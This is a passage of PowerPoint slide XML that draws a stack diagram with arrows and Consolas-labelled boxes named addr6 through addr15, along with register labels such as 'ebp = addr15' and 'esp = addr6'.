                      <a:sym typeface="Consolas"/>
                    </a:rPr>
                    <a:t>addr13</a:t>
                  </a:r>
                  <a:endParaRPr sz="1000" dirty="0">
                    <a:latin typeface="Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="364" name="组合 363">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C994AF2-22DC-43E1-A0E4-9033B73E67BE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7869461" y="391576"/>
              <a:ext cx="1336074" cy="1673869"/>
              <a:chOff x="7869461" y="391576"/>
              <a:chExt cx="1336074" cy="1673869"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="366" name="组合 365">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAEB5E83-EA48-4A37-81AD-EDE1BFD10ECC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="7875980" y="1317995"/>
                <a:ext cx="1329555" cy="327245"/>
                <a:chOff x="6615347" y="316862"/>
                <a:chExt cx="1329555" cy="327245"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="445" name="Shape 636">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25C3C87B-9D1B-4ABC-9AF4-1884E06560F6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6670753" y="316862"/>
                  <a:ext cx="1274149" cy="327245"/>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000" dirty="0">
                      <a:latin typeface="Consolas"/>
                      <a:ea typeface="Consolas"/>
                      <a:cs typeface="Consolas"/>
                      <a:sym typeface="Consolas"/>
                    </a:rPr>
                    <a:t>addr10</a:t>
                  </a:r>
                  <a:endParaRPr sz="1000" dirty="0">
                    <a:latin typeface="Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="446" name="Shape 640">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE916838-D082-4EC5-92DA-01BB53899506}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvCxnSpPr>
                  <a:cxnSpLocks/>
                </p:cNvCxnSpPr>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6615347" y="549695"/>
                  <a:ext cx="674457" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="straightConnector1">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="9525" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="dk2"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                  <a:round/>
                  <a:headEnd type="none" w="med" len="med"/>
                  <a:tailEnd type="triangle" w="med" len="med"/>
                </a:ln>
              </p:spPr>
            </p:cxnSp>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="372" name="组合 371">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0181BEB9-22CE-4CAB-B9AC-42434E53136E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="7869461" y="1740459"/>
                <a:ext cx="1329554" cy="324986"/>
                <a:chOff x="6615347" y="319121"/>
                <a:chExt cx="1329554" cy="324986"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="439" name="Shape 636">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1FAECA5-DB74-4D20-9F97-21F8AA019F7E}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6677271" y="319121"/>
                  <a:ext cx="1267630" cy="324986"/>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000" dirty="0">
                      <a:latin typeface="Consolas"/>
                      <a:ea typeface="Consolas"/>
                      <a:cs typeface="Consolas"/>
                      <a:sym typeface="Consolas"/>
                    </a:rPr>
                    <a:t>addr8</a:t>
                  </a:r>
                  <a:endParaRPr sz="1000" dirty="0">
                    <a:latin typeface="Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="444" name="Shape 640">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA18D505-177D-4227-A384-A42B8AE29BAD}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvCxnSpPr>
                  <a:cxnSpLocks/>
                </p:cNvCxnSpPr>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6615347" y="549695"/>
                  <a:ext cx="674457" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="straightConnector1">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="9525" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="dk2"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                  <a:round/>
                  <a:headEnd type="none" w="med" len="med"/>
                  <a:tailEnd type="triangle" w="med" len="med"/>
                </a:ln>
              </p:spPr>
            </p:cxnSp>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="373" name="组合 372">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BC609F4-2E20-45C3-BEA8-2ACBAE5CB20C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="7875310" y="890132"/>
                <a:ext cx="1329554" cy="331958"/>
                <a:chOff x="6615347" y="312149"/>
                <a:chExt cx="1329554" cy="331958"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="413" name="Shape 636">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1650B767-0B36-4F58-B041-927D428FEEF6}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6671422" y="312149"/>
                  <a:ext cx="1273479" cy="331958"/>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000" dirty="0">
                      <a:latin typeface="Consolas"/>
                      <a:ea typeface="Consolas"/>
                      <a:cs typeface="Consolas"/>
                      <a:sym typeface="Consolas"/>
                    </a:rPr>
                    <a:t>addr12</a:t>
                  </a:r>
                  <a:endParaRPr sz="1000" dirty="0">
                    <a:latin typeface="Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="414" name="Shape 640">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04A544CC-939A-47FC-864F-4206A00A2262}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvCxnSpPr>
                  <a:cxnSpLocks/>
                </p:cNvCxnSpPr>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6615347" y="549695"/>
                  <a:ext cx="674457" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="straightConnector1">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="9525" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="dk2"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                  <a:round/>
                  <a:headEnd type="none" w="med" len="med"/>
                  <a:tailEnd type="triangle" w="med" len="med"/>
                </a:ln>
              </p:spPr>
            </p:cxnSp>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="374" name="组合 373">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29A7BC9A-1D69-4B08-96F1-9E54101BD71B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="7875310" y="391576"/>
                <a:ext cx="1329554" cy="389440"/>
                <a:chOff x="6615347" y="254667"/>
                <a:chExt cx="1329554" cy="389440"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="394" name="Shape 636">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E786D79-36A8-41FD-B1B5-AA33A27C9D76}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6671422" y="254667"/>
                  <a:ext cx="1273479" cy="38944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000" dirty="0">
                      <a:latin typeface="Consolas"/>
                      <a:ea typeface="Consolas"/>
                      <a:cs typeface="Consolas"/>
                      <a:sym typeface="Consolas"/>
                    </a:rPr>
                    <a:t>addr14</a:t>
                  </a:r>
                  <a:endParaRPr sz="1000" dirty="0">
                    <a:latin typeface="Consolas"/>
                    <a:ea typeface="Consolas"/>
                    <a:cs typeface="Consolas"/>
                    <a:sym typeface="Consolas"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="412" name="Shape 640">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9074EF75-ABD4-4C9B-BCD0-7737AF91CD30}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvCxnSpPr>
                  <a:cxnSpLocks/>
                </p:cNvCxnSpPr>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6615347" y="549695"/>
                  <a:ext cx="674457" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="straightConnector1">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="9525" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="dk2"/>
                  </a:solidFill>
                  <a:prstDash val="solid"/>
                  <a:round/>
                  <a:headEnd type="none" w="med" len="med"/>
                  <a:tailEnd type="triangle" w="med" len="med"/>
                </a:ln>
              </p:spPr>
            </p:cxnSp>
          </p:grpSp>
        </p:grpSp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="257" name="图片 256">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F5FA463-2E6F-40A2-A5FA-E0C06E5B633D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="26949" t="63097" r="49971" b="9179"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1044535" y="4605800"/>
            <a:ext cx="1378201" cy="1180746"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="258" name="图片 257">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1635990D-85C0-4443-BD0C-DBF09F3F67EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="62850" t="63419" r="14892" b="9172"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2422738" y="4609634"/>
            <a:ext cx="1100979" cy="1184071"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="90" name="组合 89">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25A09F7C-3BA1-4647-B68E-2979AEC958AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8573893" y="365872"/>
            <a:ext cx="3049046" cy="112103"/>
            <a:chOff x="7840223" y="28808"/>
            <a:chExt cx="4289632" cy="2480283"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="47" name="组合 46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{212C446B-EDE7-43BE-9C8D-2428B51490DA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7840223" y="28808"/>
              <a:ext cx="4289632" cy="2480283"/>
              <a:chOff x="6964304" y="228815"/>
              <a:chExt cx="4213864" cy="2480282"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="195" name="Shape 640">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02DF78FF-A10B-4513-B5D6-70A7FEE13D5B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6964304" y="1098485"/>
                <a:ext cx="690098" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" cap="flat" cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:round/>
                <a:headEnd type="none" w="med" len="med"/>
                <a:tailEnd type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="38" name="组合 37">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62F1AED6-F10B-4E5E-9534-61E1EA4D9B64}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="6964304" y="228815"/>
                <a:ext cx="4213864" cy="2480282"/>
                <a:chOff x="6964304" y="228815"/>
                <a:chExt cx="4213864" cy="2480282"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="68" name="组合 67">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC61BBF3-EB73-4128-B2FF-48F4968728DB}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="6964304" y="228815"/>
                  <a:ext cx="4213864" cy="2480282"/>
                  <a:chOff x="6964304" y="228814"/>
                  <a:chExt cx="4213864" cy="3051601"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="67" name="组合 66">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57DBC66B-C884-4F2A-A0F3-758EF0577738}"/>
                      </a:ext>
                    </a:extLst>
                  </p:cNvPr>
                  <p:cNvGrpSpPr/>
                  <p:nvPr/>
                </p:nvGrpSpPr>
                <p:grpSpPr>
                  <a:xfrm>
                    <a:off x="6964304" y="228814"/>
                    <a:ext cx="4213864" cy="3051601"/>
                    <a:chOff x="6964304" y="228814"/>
                    <a:chExt cx="4213864" cy="3051601"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:grpSp>
                  <p:nvGrpSpPr>
                    <p:cNvPr id="66" name="组合 65">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52929DAC-6F39-412C-BD1A-964E9B1633DD}"/>
                        </a:ext>
                      </a:extLst>
                    </p:cNvPr>
                    <p:cNvGrpSpPr/>
                    <p:nvPr/>
                  </p:nvGrpSpPr>
                  <p:grpSpPr>
                    <a:xfrm>
                      <a:off x="6964304" y="228814"/>
                      <a:ext cx="4213864" cy="3051601"/>
                      <a:chOff x="6964304" y="228815"/>
                      <a:chExt cx="4213864" cy="3068508"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:cxnSp>
                    <p:nvCxnSpPr>
                      <p:cNvPr id="94" name="Shape 640">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{829892D2-5E69-4F68-AD5F-C0E04206F551}"/>
                          </a:ext>
                        </a:extLst>
                      </p:cNvPr>
                      <p:cNvCxnSpPr>
                        <a:cxnSpLocks/>
                      </p:cNvCxnSpPr>
                      <p:nvPr/>
                    </p:nvCxnSpPr>
                    <p:spPr>
                      <a:xfrm>
                        <a:off x="6964304" y="3155053"/>
                        <a:ext cx="690098" cy="0"/>
                      </a:xfrm>
                      <a:prstGeom prst="straightConnector1">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln w="9525" cap="flat" cmpd="sng">
                        <a:solidFill>
                          <a:schemeClr val="dk2"/>
                        </a:solidFill>
                        <a:prstDash val="solid"/>
                        <a:round/>
                        <a:headEnd type="none" w="med" len="med"/>
                        <a:tailEnd type="triangle" w="med" len="med"/>
                      </a:ln>
                    </p:spPr>
                  </p:cxnSp>
                  <p:grpSp>
                    <p:nvGrpSpPr>
                      <p:cNvPr id="65" name="组合 64">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40A83610-8C6A-43C0-82E5-13CB304BE5EE}"/>
                          </a:ext>
                        </a:extLst>
                      </p:cNvPr>
                      <p:cNvGrpSpPr/>
                      <p:nvPr/>
                    </p:nvGrpSpPr>
                    <p:grpSpPr>
                      <a:xfrm>
                        <a:off x="6964304" y="228815"/>
                        <a:ext cx="4213864" cy="3068508"/>
                        <a:chOff x="6964304" y="228815"/>
                        <a:chExt cx="4213864" cy="3068508"/>
                      </a:xfrm>
                    </p:grpSpPr>
                    <p:grpSp>
                      <p:nvGrpSpPr>
                        <p:cNvPr id="36" name="组合 35">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B5FE3DC-6CD7-48D4-80CA-4F93CC90954A}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvGrpSpPr/>
                        <p:nvPr/>
                      </p:nvGrpSpPr>
                      <p:grpSpPr>
                        <a:xfrm>
                          <a:off x="6964304" y="228815"/>
                          <a:ext cx="4213864" cy="2926233"/>
                          <a:chOff x="6964304" y="228815"/>
                          <a:chExt cx="4190258" cy="2926238"/>
                        </a:xfrm>
                      </p:grpSpPr>
                      <p:sp>
                        <p:nvSpPr>
                          <p:cNvPr id="124" name="Shape 631">
                            <a:extLst>
                              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE87383D-75E6-479D-979B-5E71FE5AD2D8}"/>
                              </a:ext>
                            </a:extLst>
                          </p:cNvPr>
                          <p:cNvSpPr/>
                          <p:nvPr/>
                        </p:nvSpPr>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="9874559" y="1575459"/>
                            <a:ext cx="1280003" cy="180923"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="accent5">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400" b="1" dirty="0"/>
                              <a:t>ebp </a:t>
                            </a:r>
                            <a:r>
                              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
                              <a:t> </a:t>
                            </a:r>
                            <a:r>
                              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                                <a:solidFill>
                                  <a:srgbClr val="FF0000"/>
                                </a:solidFill>
                              </a:rPr>
                              <a:t>addr11</a:t>
                            </a:r>
                            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                              <a:solidFill>
                                <a:srgbClr val="FF0000"/>
                              </a:solidFill>
                            </a:endParaRPr>
                          </a:p>
                        </p:txBody>
                      </p:sp>
                      <p:sp>
                        <p:nvSpPr>
                          <p:cNvPr id="125" name="Shape 631">
                            <a:extLst>
                              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A629FBF8-0DDA-4331-99DB-D885BF642DBC}"/>
                              </a:ext>
                            </a:extLst>
                          </p:cNvPr>
                          <p:cNvSpPr/>
                          <p:nvPr/>
                        </p:nvSpPr>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="9862906" y="499537"/>
                            <a:ext cx="1280003" cy="180923"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="accent5">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400" b="1" dirty="0"/>
                              <a:t>ebp </a:t>
                            </a:r>
                            <a:r>
                              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
                              <a:t>= </a:t>
                            </a:r>
                            <a:r>
                              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                                <a:solidFill>
                                  <a:srgbClr val="FF0000"/>
                                </a:solidFill>
                              </a:rPr>
                              <a:t>addr15</a:t>
                            </a:r>
                            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                              <a:solidFill>
                                <a:srgbClr val="FF0000"/>
                              </a:solidFill>
                            </a:endParaRPr>
                          </a:p>
                        </p:txBody>
                      </p:sp>
                      <p:sp>
                        <p:nvSpPr>
                          <p:cNvPr id="136" name="Shape 631">
                            <a:extLst>
                              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BBD4DB6-B412-4B86-8394-57C2000D5C5C}"/>
                              </a:ext>
                            </a:extLst>
                          </p:cNvPr>
                          <p:cNvSpPr/>
                          <p:nvPr/>
                        </p:nvSpPr>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="9862906" y="2633209"/>
                            <a:ext cx="1280003" cy="180923"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="accent5">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400" b="1" dirty="0"/>
                              <a:t>ebp </a:t>
                            </a:r>
                            <a:r>
                              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
                              <a:t>= </a:t>
                            </a:r>
                            <a:r>
                              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                                <a:solidFill>
                                  <a:srgbClr val="FF0000"/>
                                </a:solidFill>
                              </a:rPr>
                              <a:t>addr7</a:t>
                            </a:r>
                            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
                              <a:solidFill>
                                <a:srgbClr val="FF0000"/>
                              </a:solidFill>
                            </a:endParaRPr>
                          </a:p>
                        </p:txBody>
                      </p:sp>
                      <p:sp>
                        <p:nvSpPr>
                          <p:cNvPr id="76" name="Shape 631">
                            <a:extLst>
                              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EC1A9C0-E7DE-4318-976C-75D62E46D277}"/>
                              </a:ext>
                            </a:extLst>
                          </p:cNvPr>
                          <p:cNvSpPr/>
                          <p:nvPr/>
                        </p:nvSpPr>
                        <p:spPr>
                          <a:xfrm>
                            <a:off x="9862906" y="2898233"/>
                            <a:ext cx="1280003" cy="180923"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:schemeClr val="accent5">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400" b="1" dirty="0"/>
                              <a:t>esp </a:t>
                            </a:r>
                            <a:r>
                              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
                              <a:t>= </a:t>
                            </a:r>
                            <a:r>
                              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                                <a:solidFill>
                                  <a:srgbClr val="FF0000"/>
                                </a:solidFill>
                              </a:rPr>
                              <a:t>addr6</a:t>
                            </a:r>
                            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" b="1" dirty="0">
